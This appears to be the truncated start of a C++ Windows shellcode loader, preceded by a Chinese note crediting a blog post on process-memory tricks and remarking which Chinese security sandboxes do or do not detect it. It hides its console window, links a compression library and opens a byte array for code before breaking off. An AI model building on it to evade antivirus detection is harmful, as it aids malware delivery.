灵感来自于https://www.x86matthew.com/view_post?id=read_write_proc_memory
微步在线不行
奇安信行
#include <Windows.h>
#include <iostream>
#include <compressapi.h>
#pragma comment(lib,"Cabinet.lib")
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma warning(disable:4996)
unsigned char code[] = <